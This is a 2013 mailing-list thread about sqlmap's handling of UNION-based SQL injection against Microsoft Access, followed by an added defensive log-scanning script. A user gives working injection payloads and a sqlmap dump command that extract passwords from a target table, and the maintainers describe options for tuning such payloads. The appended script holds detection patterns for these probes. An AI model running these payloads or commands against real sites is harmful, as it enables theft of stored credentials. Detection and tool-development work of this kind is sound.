Thread: [sqlmap-users] MS Access: provide option to specify table name to detect union based sqli vuln
From: buawig <bu...@gm...> - 2013-03-19 19:37:24
Hi,

I've got a simple union based sqli (resulting webpage shows only one entry/row).

Valid statements that show the numbers in the resulting html page:

...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar

- foobar is an existing table (gathered via error messages in html)
- password is a valid column in the foobar table

The following URL gives you one password:

...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13 from foobar

Now I wanted to hand over to sqlmap to dump all passwords:

sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password --dump

which did not work out (0 entries retrieved), but it was confirmed that the table has several hundred entries.

- sqlmap was able to detect the number of columns is 13 (correct)
- sqlmap confirmed a boolean-based blind sqli vulnerability (but no UNION based sqli)
- sqlmap was able to confirm the existence of the table name (with --tables) (echo foobar > txt/common-tables.txt)
- sqlmap was able to confirm the existence of the column name password (with --columns)

When running something like:
--technique=U --union-cols=13 --union-char=1

sqlmap requested something *like*:

...id=-123 union all select 1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from MSysAccessObjects%00

which results in the following error message (shown in the html page):

The Microsoft Jet database engine cannot find the input table or query 'MSysAccessObjects'. Make sure it exists and that its name is spelled correctly.

So if sqlmap would accept a known table name on the command line that it would use to detect/confirm the union based sqli vuln, instead of using "MSysAccessObjects", this would make sqlmap more useful (or simply use the table name specified in -T, or one previously bruteforced, to detect union-based sqli).

thanks!

PS: I did *not* run sqlmap with special --risk/--level because I don't want to send several unneeded http requests if the vulnerability is already confirmed (manually). I'm using sqlmap mainly for exploitation (not so much for detection) and would appreciate it if the user could tell sqlmap how to exploit a certain sqli (something that is already partially given with --technique, --union-cols, --union-chars).

I did use 1.0-dev-d1ae62b.

ref:
http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
http://unconciousmind.blogspot.com/2011/05/sqlmap-vs-webappsecurity-testing-web.html
From: buawig <bu...@gm...> - 2013-03-20 16:31:32
To simply get the job done I changed the table name in:
lib/core/dicts.py:144

After changing MSysAccessObjects to foobar, sqlmap detected the union based sqli, but exploitation did not work because it created very long queries and the server replied with: "query to complex".

In the end I had to extract data using boolean based exploitation (which did work after finding a column name in the table that had unique values).
From: Bernardo D. A. G. <ber...@gm...> - 2013-03-20 16:36:09
Hi buawig,

We have a ticket to address DBMS-specific detection "limitations", https://github.com/sqlmapproject/sqlmap/issues/1 - Microsoft Access is indeed one of these cases. We could consider using the user's provided database and/or table name when these are needed at the detection phase rather than statically using hard-coded names. There are trade-offs to this thought.

With regards to the query being overly long, you can use the switch --no-cast to reduce the injected query length.

Bernardo

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
From: Miroslav S. <mir...@gm...> - 2013-03-21 10:32:38
Hi Buawig.

Implemented as requested [1]. Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/423

--
Miroslav Stampar
http://about.me/stamparm
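From the defender's side, the two artefacts this thread revolves around are useful detection signals: a UNION ... FROM <table> probe whose table is a hard-coded Jet system name (MSysAccessObjects, with a trailing null byte), and a Jet "cannot find the input table or query" error echoed into the HTML, which is how the reporter learned table names in the first place. The script below is an added example, not code from the thread or from sqlmap; the access-log lines, IPs and paths are constructed to mirror the request shapes quoted above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the thread); the second and
# third requests mirror the payload shapes quoted in the thread.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2013:19:30:01 +0000] "GET /item.asp?id=123 HTTP/1.1" 200 5120
10.0.0.5 - - [19/Mar/2013:19:30:07 +0000] "GET /item.asp?id=-123%20union%20all%20select%201,2,3,4,5,6,CHR(58)%26CHR(111)%26CHR(58),8,9,10,11,12,13%20from%20MSysAccessObjects%00 HTTP/1.1" 500 812
10.0.0.5 - - [19/Mar/2013:19:30:09 +0000] "GET /item.asp?id=123%20union%20select%20top%201%201,2,3,4,5,6,password,8,9,10,11,12,13%20from%20foobar HTTP/1.1" 200 5133
10.0.0.9 - - [19/Mar/2013:19:31:00 +0000] "GET /search.asp?q=union%20station HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Jet/Access rejects SELECT without FROM, so an Access-targeted UNION payload
# always carries a table name worth extracting.
UNION_RE = re.compile(
    r'\bunion\s+(?:all\s+)?select\b.*?\bfrom\s+([A-Za-z_]\w*)', re.I | re.S)
JET_ERROR = "cannot find the input table or query"

def classify_request(line):
    """Return a finding dict for one access-log line, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group("path").partition("?")[2])
    u = UNION_RE.search(query)
    if not u:
        return None
    table = u.group(1)
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "table": table,
        # MSys* are Jet system tables: typical of a tool's hard-coded probe
        "system_table": table.lower().startswith("msys"),
        # trailing %00 decodes to NUL, as in the sqlmap request quoted above
        "null_byte": "\x00" in query,
    }

def scan_log(text):
    """All findings from a block of access-log text, in order."""
    return [f for f in (classify_request(l) for l in text.splitlines()) if f]

def leaks_jet_error(html):
    """True if a response body carries the Jet 'cannot find table' error,
    which tells a requester whether a guessed table name exists."""
    return JET_ERROR in html
```

Pairing a flagged request with leaks_jet_error() on its response body separates a blind probe from a verbose error leak that should be fixed with a generic error page.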